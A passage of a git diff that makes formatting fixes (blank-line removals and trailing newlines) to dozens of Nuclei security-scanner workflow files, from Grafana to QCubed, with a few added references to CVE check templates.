-4,7 +4,6 @@ info: name: Grafana Security Checks author: pdteam description: A simple workflow that runs all Grafana related nuclei templates on a given target. - workflows: - template: http/exposed-panels/grafana-detect.yaml subtemplates: diff --git a/workflows/graphite-workflow.yaml b/workflows/graphite-workflow.yaml index c214d5d574..b2f691adca 100644 --- a/workflows/graphite-workflow.yaml +++ b/workflows/graphite-workflow.yaml @@ -4,7 +4,6 @@ info: name: Graphite Security Checks author: daffainfo description: A simple workflow that runs all Graphite related nuclei templates on a given target. - workflows: - template: http/exposed-panels/graphite-browser.yaml subtemplates: diff --git a/workflows/grav-workflow.yaml b/workflows/grav-workflow.yaml index 3a1b86b2dd..bbaf711976 100644 --- a/workflows/grav-workflow.yaml +++ b/workflows/grav-workflow.yaml @@ -4,7 +4,6 @@ info: name: Grav Security Checks author: daffainfo description: A simple workflow that runs all Grav related nuclei templates on a given target. - workflows: - template: http/technologies/grav-cms-detect.yaml subtemplates: diff --git a/workflows/gsoap-workflow.yaml b/workflows/gsoap-workflow.yaml index 71466c9293..3aa6c1e8c4 100644 --- a/workflows/gsoap-workflow.yaml +++ b/workflows/gsoap-workflow.yaml @@ -4,7 +4,6 @@ info: name: gSOAP Security Checks author: daffainfo description: A simple workflow that runs all gSOAP related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml subtemplates: diff --git a/workflows/guacamole-workflow.yaml b/workflows/guacamole-workflow.yaml index dbdda6cc86..28620f70c3 100644 --- a/workflows/guacamole-workflow.yaml +++ b/workflows/guacamole-workflow.yaml @@ -4,10 +4,9 @@ info: name: Apache Guacamole Security Checks author: daffainfo description: A simple workflow that runs all Apache Guacamole related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: guacamole subtemplates: - - tags: guacamole \ No newline at end of file + - tags: guacamole diff --git a/workflows/h3c-imc-workflow.yaml b/workflows/h3c-imc-workflow.yaml index 412404875d..e9c35334d6 100644 --- a/workflows/h3c-imc-workflow.yaml +++ b/workflows/h3c-imc-workflow.yaml @@ -4,10 +4,9 @@ info: name: H3c IMC Security Checks author: daffainfo description: A simple workflow that runs all H3c IMC related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: h3c-imc subtemplates: - - tags: h3c-imc \ No newline at end of file + - tags: h3c-imc diff --git a/workflows/harbor-workflow.yaml b/workflows/harbor-workflow.yaml index 4c6039a2da..e6f6e17eab 100644 --- a/workflows/harbor-workflow.yaml +++ b/workflows/harbor-workflow.yaml @@ -4,8 +4,7 @@ info: name: Harbor Security Checks author: pikpikcu description: A simple workflow that runs all Harbor related nuclei templates on a given target. - workflows: - template: http/technologies/harbor-detect.yaml subtemplates: - - template: http/cves/2019/CVE-2019-16097.yaml \ No newline at end of file + - template: http/cves/2019/CVE-2019-16097.yaml diff --git a/workflows/hikvision-workflow.yaml b/workflows/hikvision-workflow.yaml index 5dd6aca463..7f190af102 100644 --- a/workflows/hikvision-workflow.yaml +++ b/workflows/hikvision-workflow.yaml @@ -4,9 +4,7 @@ info: name: Hikvision Security Checks author: pdteam description: A simple workflow that runs all Hikvision related nuclei templates on a given target. - workflows: - - template: http/technologies/hikvision-detect.yaml subtemplates: - - template: http/cves/2021/CVE-2021-36260.yaml \ No newline at end of file + - template: http/cves/2021/CVE-2021-36260.yaml diff --git a/workflows/igs-workflow.yaml b/workflows/igs-workflow.yaml index 32cc4b9c33..8387bf5a7c 100644 --- a/workflows/igs-workflow.yaml +++ b/workflows/igs-workflow.yaml @@ -4,7 +4,6 @@ info: name: SAP Internet Graphics Server (IGS) Security Checks author: daffainfo description: A simple workflow that runs all SAP Internet Graphics Server (IGS) related nuclei templates on a given target. - workflows: - template: http/technologies/sap/sap-igs-detect.yaml subtemplates: diff --git a/workflows/itop-workflow.yaml b/workflows/itop-workflow.yaml index 119fabdcdc..f089bdb981 100644 --- a/workflows/itop-workflow.yaml +++ b/workflows/itop-workflow.yaml @@ -4,7 +4,6 @@ info: name: iTop Security Checks author: daffainfo description: A simple workflow that runs all iTop related nuclei templates on a given target. - workflows: - template: http/exposed-panels/itop-panel.yaml subtemplates: diff --git a/workflows/jboss-workflow.yaml b/workflows/jboss-workflow.yaml index f078b290c9..a92e416ebe 100644 --- a/workflows/jboss-workflow.yaml +++ b/workflows/jboss-workflow.yaml @@ -4,8 +4,7 @@ info: name: JBoss Security Checks author: daffainfo description: A simple workflow that runs all JBoss related nuclei templates on a given target. - workflows: - template: http/technologies/jboss-detect.yaml subtemplates: - - tags: jboss \ No newline at end of file + - tags: jboss diff --git a/workflows/jeedom-workflow.yaml b/workflows/jeedom-workflow.yaml index 65e666bf06..489ab360c7 100644 --- a/workflows/jeedom-workflow.yaml +++ b/workflows/jeedom-workflow.yaml @@ -4,7 +4,6 @@ info: name: Jeedom Security Checks author: daffainfo description: A simple workflow that runs all Jeedom related nuclei templates on a given target. - workflows: - template: http/exposed-panels/jeedom-panel.yaml subtemplates: diff --git a/workflows/jellyfin-workflow.yaml b/workflows/jellyfin-workflow.yaml index 2a7e0965d7..8eed12f2bb 100644 --- a/workflows/jellyfin-workflow.yaml +++ b/workflows/jellyfin-workflow.yaml @@ -4,9 +4,9 @@ info: name: Jellyfin Security Checks author: dwisiswant0 description: A simple workflow that runs all Jellyfin related nuclei templates on a given target. - workflows: - template: http/technologies/jellyfin-detect.yaml subtemplates: - template: http/cves/2020/CVE-2020-26948.yaml + - template: http/cves/2021/CVE-2021-21402.yaml diff --git a/workflows/jenkins-workflow.yaml b/workflows/jenkins-workflow.yaml index 8b78a8bf6a..d2ba5e1a61 100644 --- a/workflows/jenkins-workflow.yaml +++ b/workflows/jenkins-workflow.yaml @@ -4,9 +4,7 @@ info: name: Jenkins workflow author: philippedelteil description: Workflow that runs all Jenkins related nuclei templates - workflows: - - template: http/technologies/jenkins-detect.yaml subtemplates: - - tags: jenkins \ No newline at end of file + - tags: jenkins diff --git a/workflows/jetty-workflow.yaml b/workflows/jetty-workflow.yaml index 0d145cca3e..719bb07d20 100644 --- a/workflows/jetty-workflow.yaml +++ b/workflows/jetty-workflow.yaml @@ -4,7 +4,6 @@ info: name: Jetty Security Checks author: daffainfo description: A simple workflow that runs all Jetty related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: diff --git a/workflows/jira-workflow.yaml b/workflows/jira-workflow.yaml index 5e184dcfcd..55b0ac40eb 100644 --- a/workflows/jira-workflow.yaml +++ b/workflows/jira-workflow.yaml @@ -4,8 +4,7 @@ info: name: Jira Security Checks author: micha3lb3n description: A simple workflow that runs all Jira related nuclei templates on a given target. - workflows: - template: http/technologies/jira-detect.yaml subtemplates: - - tags: jira \ No newline at end of file + - tags: jira diff --git a/workflows/joomla-workflow.yaml b/workflows/joomla-workflow.yaml index e379ad694d..ae492727dc 100644 --- a/workflows/joomla-workflow.yaml +++ b/workflows/joomla-workflow.yaml @@ -4,7 +4,6 @@ info: name: Joomla! Security Checks author: daffainfo description: A simple workflow that runs all Joomla! related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: diff --git a/workflows/kentico-workflow.yaml b/workflows/kentico-workflow.yaml index 0c0665409a..835cb9a8b4 100644 --- a/workflows/kentico-workflow.yaml +++ b/workflows/kentico-workflow.yaml @@ -4,10 +4,9 @@ info: name: Kentico CMS Security Checks author: daffainfo description: A simple workflow that runs all Kentico CMS related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: kentico subtemplates: - - tags: kentico \ No newline at end of file + - tags: kentico diff --git a/workflows/kev-workflow.yaml b/workflows/kev-workflow.yaml index 374f38e138..c27f4a9713 100644 --- a/workflows/kev-workflow.yaml +++ b/workflows/kev-workflow.yaml @@ -4,6 +4,5 @@ info: name: KEV Workflow author: king-alexander description: This workflow runs the relevant Nuclei templates to detect Known Exploited Vulnerabilities. - workflows: - tags: kev diff --git a/workflows/keycloak-workflow.yaml b/workflows/keycloak-workflow.yaml index 2290787628..11e139a7ae 100644 --- a/workflows/keycloak-workflow.yaml +++ b/workflows/keycloak-workflow.yaml @@ -4,7 +4,6 @@ info: name: Keycloak Security Checks author: daffainfo description: A simple workflow that runs all Keycloak related nuclei templates on a given target. - workflows: - template: http/exposed-panels/keycloak-admin-panel.yaml subtemplates: diff --git a/workflows/kibana-workflow.yaml b/workflows/kibana-workflow.yaml index 2bcb5d11d3..623ceb9ab5 100644 --- a/workflows/kibana-workflow.yaml +++ b/workflows/kibana-workflow.yaml @@ -4,7 +4,6 @@ info: name: Kibana Security Checks author: daffainfo description: A simple workflow that runs all Kibana related nuclei templates on a given target. - workflows: - template: http/exposed-panels/kibana-panel.yaml subtemplates: diff --git a/workflows/kindeditor-workflow.yaml b/workflows/kindeditor-workflow.yaml index 20231d6ffb..5da45fe9d7 100644 --- a/workflows/kindeditor-workflow.yaml +++ b/workflows/kindeditor-workflow.yaml @@ -4,10 +4,9 @@ info: name: KindEditor Security Checks author: daffainfo description: A simple workflow that runs all KindEditor related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: kindeditor subtemplates: - - tags: kindeditor \ No newline at end of file + - tags: kindeditor diff --git a/workflows/kong-workflow.yaml b/workflows/kong-workflow.yaml index 773319295c..8809296007 100644 --- a/workflows/kong-workflow.yaml +++ b/workflows/kong-workflow.yaml @@ -4,8 +4,7 @@ info: name: Kong Security Checks author: daffainfo description: A simple workflow that runs all Kong related nuclei templates on a given target. - workflows: - template: http/technologies/kong-detect.yaml subtemplates: - - tags: kong \ No newline at end of file + - tags: kong diff --git a/workflows/lanproxy-workflow.yaml b/workflows/lanproxy-workflow.yaml index 14e3d9f36e..e3e524df52 100644 --- a/workflows/lanproxy-workflow.yaml +++ b/workflows/lanproxy-workflow.yaml @@ -4,10 +4,9 @@ info: name: Lanproxy Security Checks author: daffainfo description: A simple workflow that runs all Lanproxy related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: lanproxy subtemplates: - - tags: lanproxy \ No newline at end of file + - tags: lanproxy diff --git a/workflows/lansweeper-workflow.yaml b/workflows/lansweeper-workflow.yaml index 3cd0349aa6..5bd32a9fee 100644 --- a/workflows/lansweeper-workflow.yaml +++ b/workflows/lansweeper-workflow.yaml @@ -4,7 +4,6 @@ info: name: Lansweeper Security Checks author: daffainfo description: A simple workflow that runs all Lansweeper related nuclei templates on a given target. - workflows: - template: http/exposed-panels/lansweeper-login.yaml subtemplates: diff --git a/workflows/laravel-workflow.yaml b/workflows/laravel-workflow.yaml index c1a2fae0ad..94b92c68af 100644 --- a/workflows/laravel-workflow.yaml +++ b/workflows/laravel-workflow.yaml @@ -4,10 +4,9 @@ info: name: Laravel Security Checks author: daffainfo description: A simple workflow that runs all Laravel related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: laravel subtemplates: - - tags: laravel \ No newline at end of file + - tags: laravel diff --git a/workflows/liferay-workflow.yaml b/workflows/liferay-workflow.yaml index fcf69ec0ee..4bdb897361 100644 --- a/workflows/liferay-workflow.yaml +++ b/workflows/liferay-workflow.yaml @@ -4,7 +4,6 @@ info: name: Liferay Security Checks author: dwisiswant0 description: A simple workflow that runs all liferay related nuclei templates on a given target. - workflows: - template: http/exposed-panels/liferay-portal.yaml subtemplates: diff --git a/workflows/lotus-domino-workflow.yaml b/workflows/lotus-domino-workflow.yaml index 9152da4bdd..c7d294b9ff 100644 --- a/workflows/lotus-domino-workflow.yaml +++ b/workflows/lotus-domino-workflow.yaml @@ -4,7 +4,6 @@ info: name: Lotus Domino Security Checks author: CasperGN description: A simple workflow that runs all Lotus Domino related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: @@ -12,4 +11,4 @@ workflows: subtemplates: - template: http/technologies/lotus-domino-version.yaml subtemplates: - - template: http/cves/2005/CVE-2005-2428.yaml \ No newline at end of file + - template: http/cves/2005/CVE-2005-2428.yaml diff --git a/workflows/lucee-workflow.yaml b/workflows/lucee-workflow.yaml index 462e929f16..75b1a63e92 100644 --- a/workflows/lucee-workflow.yaml +++ b/workflows/lucee-workflow.yaml @@ -4,7 +4,6 @@ info: name: Lucee Detection Workflow author: geeknik,dhiyaneshDk description: A simple workflow that runs all Lucee related nuclei templates on a given target. - workflows: - template: http/technologies/lucee-detect.yaml subtemplates: diff --git a/workflows/magento-workflow.yaml b/workflows/magento-workflow.yaml index b62e750416..b0a7afe386 100644 --- a/workflows/magento-workflow.yaml +++ b/workflows/magento-workflow.yaml @@ -4,8 +4,7 @@ info: name: Magento Security Checks author: TechbrunchFR description: A simple workflow that runs all Magento related nuclei templates on a given target. - workflows: - template: http/technologies/magento-version-detect.yaml subtemplates: - - template: http/technologies/magento-eol.yaml \ No newline at end of file + - template: http/technologies/magento-eol.yaml diff --git a/workflows/magmi-workflow.yaml b/workflows/magmi-workflow.yaml index 730b7fb5a3..9818085905 100644 --- a/workflows/magmi-workflow.yaml +++ b/workflows/magmi-workflow.yaml @@ -4,8 +4,7 @@ info: name: MAGMI Security Checks author: dwisiswant0,daffainfo description: A simple workflow that runs all MAGMI related nuclei templates on a given target. - workflows: - template: http/technologies/magmi-detect.yaml subtemplates: - - tags: magmi \ No newline at end of file + - tags: magmi diff --git a/workflows/maian-workflow.yaml b/workflows/maian-workflow.yaml index e4a70991ee..de0a5991b3 100644 --- a/workflows/maian-workflow.yaml +++ b/workflows/maian-workflow.yaml @@ -4,8 +4,7 @@ info: name: Maian Cart Security Checks author: daffainfo description: A simple workflow that runs all Maian Cart related nuclei templates on a given target. - workflows: - template: http/technologies/maian-cart-detect.yaml subtemplates: - - tags: maian \ No newline at end of file + - tags: maian diff --git a/workflows/mantisbt-workflow.yaml b/workflows/mantisbt-workflow.yaml index 74662d8358..5fbe0be154 100644 --- a/workflows/mantisbt-workflow.yaml +++ b/workflows/mantisbt-workflow.yaml @@ -4,7 +4,6 @@ info: name: MantisBT Security Checks author: daffainfo description: A simple workflow that runs all MantisBT related nuclei templates on a given target. - workflows: - template: http/exposed-panels/mantisbt-panel.yaml subtemplates: diff --git a/workflows/mautic-workflow.yaml b/workflows/mautic-workflow.yaml index aed3bd5a0e..28b83b2bd5 100644 --- a/workflows/mautic-workflow.yaml +++ b/workflows/mautic-workflow.yaml @@ -4,10 +4,9 @@ info: name: Mautic CRM Security Checks author: daffainfo description: A simple workflow that runs all Mautic CRM related nuclei templates on a given target. - workflows: - template: http/technologies/favicon-detect.yaml matchers: - name: mautic subtemplates: - - tags: mautic \ No newline at end of file + - tags: mautic diff --git a/workflows/metabase-workflow.yaml b/workflows/metabase-workflow.yaml index 3e0f4c3277..cb7aa94f3c 100644 --- a/workflows/metabase-workflow.yaml +++ b/workflows/metabase-workflow.yaml @@ -4,7 +4,6 @@ info: name: Metabase Security Checks author: daffainfo description: A simple workflow that runs all Metabase Pipeline related nuclei templates on a given target. - workflows: - template: http/exposed-panels/metabase-panel.yaml subtemplates: diff --git a/workflows/metinfo-workflow.yaml b/workflows/metinfo-workflow.yaml index 78e978718e..5a08a405b9 100644 --- a/workflows/metinfo-workflow.yaml +++ b/workflows/metinfo-workflow.yaml @@ -4,10 +4,9 @@ info: name: MetInfo Security Checks author: daffainfo description: A simple workflow that runs all MetInfo related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: metinfo subtemplates: - - tags: metinfo \ No newline at end of file + - tags: metinfo diff --git a/workflows/micro-focus-workflow.yaml b/workflows/micro-focus-workflow.yaml index 98b582f00d..8e8c741a51 100644 --- a/workflows/micro-focus-workflow.yaml +++ b/workflows/micro-focus-workflow.yaml @@ -4,8 +4,9 @@ info: name: Micro Focus Checks author: dwisiswant0 description: A simple workflow that runs all Micro Focus related nuclei templates on a given target. - workflows: - template: http/default-logins/UCMDB/ + - template: http/cves/2020/CVE-2020-11853.yaml + - template: http/cves/2020/CVE-2020-11854.yaml diff --git a/workflows/microsoft-exchange-workflow.yaml b/workflows/microsoft-exchange-workflow.yaml index 0ca3d1f8ca..ea8a19b636 100644 --- a/workflows/microsoft-exchange-workflow.yaml +++ b/workflows/microsoft-exchange-workflow.yaml @@ -4,8 +4,7 @@ info: name: Microsoft Exchange Security Checks author: daffainfo description: A simple workflow that runs all Microsoft Exchange related nuclei templates on a given target. - workflows: - template: http/technologies/microsoft/ms-exchange-server.yaml subtemplates: - - tags: exchange \ No newline at end of file + - tags: exchange diff --git a/workflows/microstrategy-workflow.yaml b/workflows/microstrategy-workflow.yaml index e6df2e2af3..342eb34869 100644 --- a/workflows/microstrategy-workflow.yaml +++ b/workflows/microstrategy-workflow.yaml @@ -4,8 +4,7 @@ info: name: MicroStrategy Security Checks author: daffainfo description: A simple workflow that runs all MicroStrategy related nuclei templates on a given target. - workflows: - template: http/technologies/microstrategy-detect.yaml subtemplates: - - tags: microstrategy \ No newline at end of file + - tags: microstrategy diff --git a/workflows/mida-eframework-workflow.yaml b/workflows/mida-eframework-workflow.yaml index 5ee0f8bd90..1a592b950f 100644 --- a/workflows/mida-eframework-workflow.yaml +++ b/workflows/mida-eframework-workflow.yaml @@ -4,7 +4,6 @@ info: name: Mida eFramework Security Checks author: CasperGN description: A simple workflow that runs all Mida eFramework related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: diff --git a/workflows/mobileiron-workflow.yaml b/workflows/mobileiron-workflow.yaml index 2924604145..e39a893748 100644 --- a/workflows/mobileiron-workflow.yaml +++ b/workflows/mobileiron-workflow.yaml @@ -4,8 +4,7 @@ info: name: MobileIron Security Checks author: daffainfo description: A simple workflow that runs all MobileIron related nuclei templates on a given target. - workflows: - template: http/exposed-panels/mobileiron-login.yaml subtemplates: - - tags: mobileiron \ No newline at end of file + - tags: mobileiron diff --git a/workflows/moodle-workflow.yaml b/workflows/moodle-workflow.yaml index 61cde0bbd4..0e3c57dc84 100644 --- a/workflows/moodle-workflow.yaml +++ b/workflows/moodle-workflow.yaml @@ -4,7 +4,6 @@ info: name: Moodle Security Checks author: daffainfo description: A simple workflow that runs all Moodle related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: diff --git a/workflows/movable-workflow.yaml b/workflows/movable-workflow.yaml index 01918d1c2f..bb19cdc13e 100644 --- a/workflows/movable-workflow.yaml +++ b/workflows/movable-workflow.yaml @@ -4,7 +4,6 @@ info: name: Movable Type Security Checks author: dhiyaneshDk description: A simple workflow that runs all Movable related nuclei templates on a given target. - workflows: - template: http/technologies/default-movable-page.yaml subtemplates: @@ -12,4 +11,4 @@ workflows: - template: http/exposed-panels/movable-type-login.yaml subtemplates: - - template: http/cves/2021/CVE-2021-20837.yaml \ No newline at end of file + - template: http/cves/2021/CVE-2021-20837.yaml diff --git a/workflows/netgear-workflow.yaml b/workflows/netgear-workflow.yaml index ff985ce9c4..a6828d9b0a 100644 --- a/workflows/netgear-workflow.yaml +++ b/workflows/netgear-workflow.yaml @@ -4,8 +4,7 @@ info: name: NETGEAR Security Checks author: dwisiswant0 description: A simple workflow that runs all NETGEAR related nuclei templates on a given target. - workflows: - template: http/exposed-panels/netgear-version-detect.yaml subtemplates: - - tags: netgear \ No newline at end of file + - tags: netgear diff --git a/workflows/netsweeper-workflow.yaml b/workflows/netsweeper-workflow.yaml index f6a0cfc479..72061a7412 100644 --- a/workflows/netsweeper-workflow.yaml +++ b/workflows/netsweeper-workflow.yaml @@ -4,8 +4,7 @@ info: name: Netsweeper Security Checks author: dwisiswant0,daffainfo description: A simple workflow that runs all netsweeper related nuclei templates on a given target. - workflows: - template: http/technologies/netsweeper-webadmin-detect.yaml subtemplates: - - tags: netsweeper \ No newline at end of file + - tags: netsweeper diff --git a/workflows/nette-workflow.yaml b/workflows/nette-workflow.yaml index 5dc79acfcd..b4121ab109 100644 --- a/workflows/nette-workflow.yaml +++ b/workflows/nette-workflow.yaml @@ -4,10 +4,9 @@ info: name: Nette Framework Security Checks author: daffainfo description: A simple workflow that runs all Nette Framework related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: nette subtemplates: - - tags: nette \ No newline at end of file + - tags: nette diff --git a/workflows/node-red-workflow.yaml b/workflows/node-red-workflow.yaml index b91ec24607..352fa4b31c 100644 --- a/workflows/node-red-workflow.yaml +++ b/workflows/node-red-workflow.yaml @@ -4,7 +4,6 @@ info: name: Node-RED-Dashboard Security Checks author: daffainfo description: A simple workflow that runs all Node-RED-Dashboard related nuclei templates on a given target. - workflows: - template: http/technologies/node-red-detect.yaml subtemplates: diff --git a/workflows/novnc-workflow.yaml b/workflows/novnc-workflow.yaml index cefa8b1934..3000e61c0b 100644 --- a/workflows/novnc-workflow.yaml +++ b/workflows/novnc-workflow.yaml @@ -4,10 +4,9 @@ info: name: noVNC Security Checks author: daffainfo description: A simple workflow that runs all noVNC related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: novnc subtemplates: - - tags: novnc \ No newline at end of file + - tags: novnc diff --git a/workflows/ofbiz-workflow.yaml b/workflows/ofbiz-workflow.yaml index 1c254b101d..0c1e724e02 100644 --- a/workflows/ofbiz-workflow.yaml +++ b/workflows/ofbiz-workflow.yaml @@ -4,7 +4,6 @@ info: name: OFBiz Security Checks author: daffainfo description: A simple workflow that runs all OFBiz related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: diff --git a/workflows/openam-workflow.yaml b/workflows/openam-workflow.yaml index ae8e5abb48..6222cef8f4 100644 --- a/workflows/openam-workflow.yaml +++ b/workflows/openam-workflow.yaml @@ -4,7 +4,6 @@ info: name: OpenAM Security Checks author: daffainfo description: A simple workflow that runs all OpenAM related nuclei templates on a given target. - workflows: - template: http/exposed-panels/openam-panel.yaml subtemplates: diff --git a/workflows/openemr-workflow.yaml b/workflows/openemr-workflow.yaml index 58b4605384..aa0a7674df 100644 --- a/workflows/openemr-workflow.yaml +++ b/workflows/openemr-workflow.yaml @@ -4,7 +4,6 @@ info: name: OpenEMR Security Checks author: daffainfo description: A simple workflow that runs all OpenEMR related nuclei templates on a given target. - workflows: - template: http/exposed-panels/openemr-detect.yaml subtemplates: diff --git a/workflows/opensis-workflow.yaml b/workflows/opensis-workflow.yaml index 50f364a603..102ec6cfbe 100644 --- a/workflows/opensis-workflow.yaml +++ b/workflows/opensis-workflow.yaml @@ -4,7 +4,6 @@ info: name: OpenSIS Security Checks author: daffainfo description: A simple workflow that runs all OpenSIS related nuclei templates on a given target. - workflows: - template: http/exposed-panels/opensis-panel.yaml subtemplates: diff --git a/workflows/opensns-workflow.yaml b/workflows/opensns-workflow.yaml index e5dd1b61e1..3651bac3d2 100644 --- a/workflows/opensns-workflow.yaml +++ b/workflows/opensns-workflow.yaml @@ -4,10 +4,9 @@ info: name: OpenSNS Security Checks author: daffainfo description: A simple workflow that runs all OpenSNS related nuclei templates on a given target. - workflows: - template: http/technologies/favicon-detect.yaml matchers: - name: opensns subtemplates: - - tags: opensns \ No newline at end of file + - tags: opensns diff --git a/workflows/oracle-peoplesoft-workflow.yaml b/workflows/oracle-peoplesoft-workflow.yaml index 24f7ff6b31..c757e1e648 100644 --- a/workflows/oracle-peoplesoft-workflow.yaml +++ b/workflows/oracle-peoplesoft-workflow.yaml @@ -4,9 +4,7 @@ info: name: oracle-peoplesoft Security Checks author: LogicalHunter description: A simple workflow that runs all oracle-peoplesoft related nuclei templates on a given target. - workflows: - - template: http/exposed-panels/oracle-people-sign-in.yaml subtemplates: - - tags: oracle \ No newline at end of file + - tags: oracle diff --git a/workflows/oscommerce-workflow.yaml b/workflows/oscommerce-workflow.yaml index 87429368ff..84b5ba8112 100644 --- a/workflows/oscommerce-workflow.yaml +++ b/workflows/oscommerce-workflow.yaml @@ -4,10 +4,9 @@ info: name: osCommerce Security Checks author: daffainfo description: A simple workflow that runs all osCommerce related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: oscommerce subtemplates: - - tags: oscommerce \ No newline at end of file + - tags: oscommerce diff --git a/workflows/pandora-workflow.yaml b/workflows/pandora-workflow.yaml index 514bcab1d7..bb39a89ccf 100644 --- a/workflows/pandora-workflow.yaml +++ b/workflows/pandora-workflow.yaml @@ -4,7 +4,6 @@ info: name: Pandora FMS Security Checks author: daffainfo description: A simple workflow that runs all Pandora FMS related nuclei templates on a given target. - workflows: - template: http/exposed-panels/pandora-fms-console.yaml subtemplates: diff --git a/workflows/pega-workflow.yaml b/workflows/pega-workflow.yaml index c23c540b2e..b7b2ad0340 100644 --- a/workflows/pega-workflow.yaml +++ b/workflows/pega-workflow.yaml @@ -4,7 +4,6 @@ info: name: Pega Security Checks author: daffainfo description: A simple workflow that runs all Pega related nuclei templates on a given target. - workflows: - template: http/technologies/pega-detect.yaml subtemplates: diff --git a/workflows/pentaho-workflow.yaml b/workflows/pentaho-workflow.yaml index e02cd961a8..205d84da3e 100644 --- a/workflows/pentaho-workflow.yaml +++ b/workflows/pentaho-workflow.yaml @@ -4,7 +4,6 @@ info: name: Pentaho Security Checks author: daffainfo description: A simple workflow that runs all Pentaho related nuclei templates on a given target. - workflows: - template: http/exposed-panels/pentaho-panel.yaml subtemplates: diff --git a/workflows/phpcollab-workflow.yaml b/workflows/phpcollab-workflow.yaml index fee9a33064..4c439c4546 100644 --- a/workflows/phpcollab-workflow.yaml +++ b/workflows/phpcollab-workflow.yaml @@ -4,7 +4,6 @@ info: name: PhpCollab Security Checks author: daffainfo description: A simple workflow that runs all PhpCollab related nuclei templates on a given target. - workflows: - template: http/exposed-panels/phpcollab-panel.yaml subtemplates: diff --git a/workflows/phpmyadmin-workflow.yaml b/workflows/phpmyadmin-workflow.yaml index bc952d611b..249d315ee9 100644 --- a/workflows/phpmyadmin-workflow.yaml +++ b/workflows/phpmyadmin-workflow.yaml @@ -4,7 +4,6 @@ info: name: phpmyadmin-workflow author: philippedelteil description: A workflow that runs all PhpMyAdmin related nuclei templates on a given target - workflows: - template: http/exposed-panels/phpmyadmin-panel.yaml subtemplates: diff --git a/workflows/phppgadmin-workflow.yaml b/workflows/phppgadmin-workflow.yaml index 5d2b8c5f64..9f1e753e26 100644 --- a/workflows/phppgadmin-workflow.yaml +++ b/workflows/phppgadmin-workflow.yaml @@ -4,10 +4,9 @@ info: name: phpPgAdmin Security Checks author: daffainfo description: A simple workflow that runs all phpPgAdmin related nuclei templates on a given target. - workflows: - template: http/technologies/tech-detect.yaml matchers: - name: phppgadmin subtemplates: - - tags: phppgadmin \ No newline at end of file + - tags: phppgadmin diff --git a/workflows/phpwiki-workflow.yaml b/workflows/phpwiki-workflow.yaml index db8ddba0a3..ad15f07f43 100644 --- a/workflows/phpwiki-workflow.yaml +++ b/workflows/phpwiki-workflow.yaml @@ -4,10 +4,9 @@ info: name: phpwiki Security Checks author: daffainfo description: A simple workflow that runs all phpwiki related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: phpwiki subtemplates: - - tags: phpwiki \ No newline at end of file + - tags: phpwiki diff --git a/workflows/powercreator-workflow.yaml b/workflows/powercreator-workflow.yaml index 735f314e41..63f1a0228b 100644 --- a/workflows/powercreator-workflow.yaml +++ b/workflows/powercreator-workflow.yaml @@ -4,10 +4,9 @@ info: name: PowerCreator CMS Security Checks author: daffainfo description: A simple workflow that runs all PowerCreator CMS related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: powercreator subtemplates: - - tags: powercreator \ No newline at end of file + - tags: powercreator diff --git a/workflows/processmaker-workflow.yaml b/workflows/processmaker-workflow.yaml index a463195501..f2e938576f 100644 --- a/workflows/processmaker-workflow.yaml +++ b/workflows/processmaker-workflow.yaml @@ -4,10 +4,9 @@ info: name: ProcessMaker Security Checks author: daffainfo description: A simple workflow that runs all ProcessMaker related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: processmaker subtemplates: - - tags: processmaker \ No newline at end of file + - tags: processmaker diff --git a/workflows/prometheus-workflow.yaml b/workflows/prometheus-workflow.yaml index 0dd845f68c..1ac09de594 100644 --- a/workflows/prometheus-workflow.yaml +++ b/workflows/prometheus-workflow.yaml @@ -4,8 +4,7 @@ info: name: Prometheus Security Checks author: daffainfo description: A simple workflow that runs all Prometheus related nuclei templates on a given target. - workflows: - template: http/exposed-panels/prometheus-exposed-panel.yaml subtemplates: - - tags: prometheus \ No newline at end of file + - tags: prometheus diff --git a/workflows/prtg-workflow.yaml b/workflows/prtg-workflow.yaml index 2106e6b393..4d08bb902a 100644 --- a/workflows/prtg-workflow.yaml +++ b/workflows/prtg-workflow.yaml @@ -4,8 +4,7 @@ info: name: PRTG Security Checks author: daffainfo description: A simple workflow that runs all PRTG related nuclei templates on a given target. - workflows: - template: http/technologies/prtg-detect.yaml subtemplates: - - tags: prtg \ No newline at end of file + - tags: prtg diff --git a/workflows/pulsesecure-workflow.yaml b/workflows/pulsesecure-workflow.yaml index 2c26107567..c8500566dd 100644 --- a/workflows/pulsesecure-workflow.yaml +++ b/workflows/pulsesecure-workflow.yaml @@ -4,10 +4,9 @@ info: name: Pulse Connect Secure Security Checks author: daffainfo description: A simple workflow that runs all Pulse Connect Secure related nuclei templates on a given target. - workflows: - template: http/technologies/fingerprinthub-web-fingerprints.yaml matchers: - name: pulsesecure subtemplates: - - tags: pulsesecure \ No newline at end of file + - tags: pulsesecure diff --git a/workflows/qcubed-workflow.yaml b/workflows/qcubed-workflow.yaml index ff514defbd..2708ecbdd7 100644 --- a/workflows/qcubed-workflow.yaml +++ b/workflows/qcubed-workflow.yaml @@ -4,10 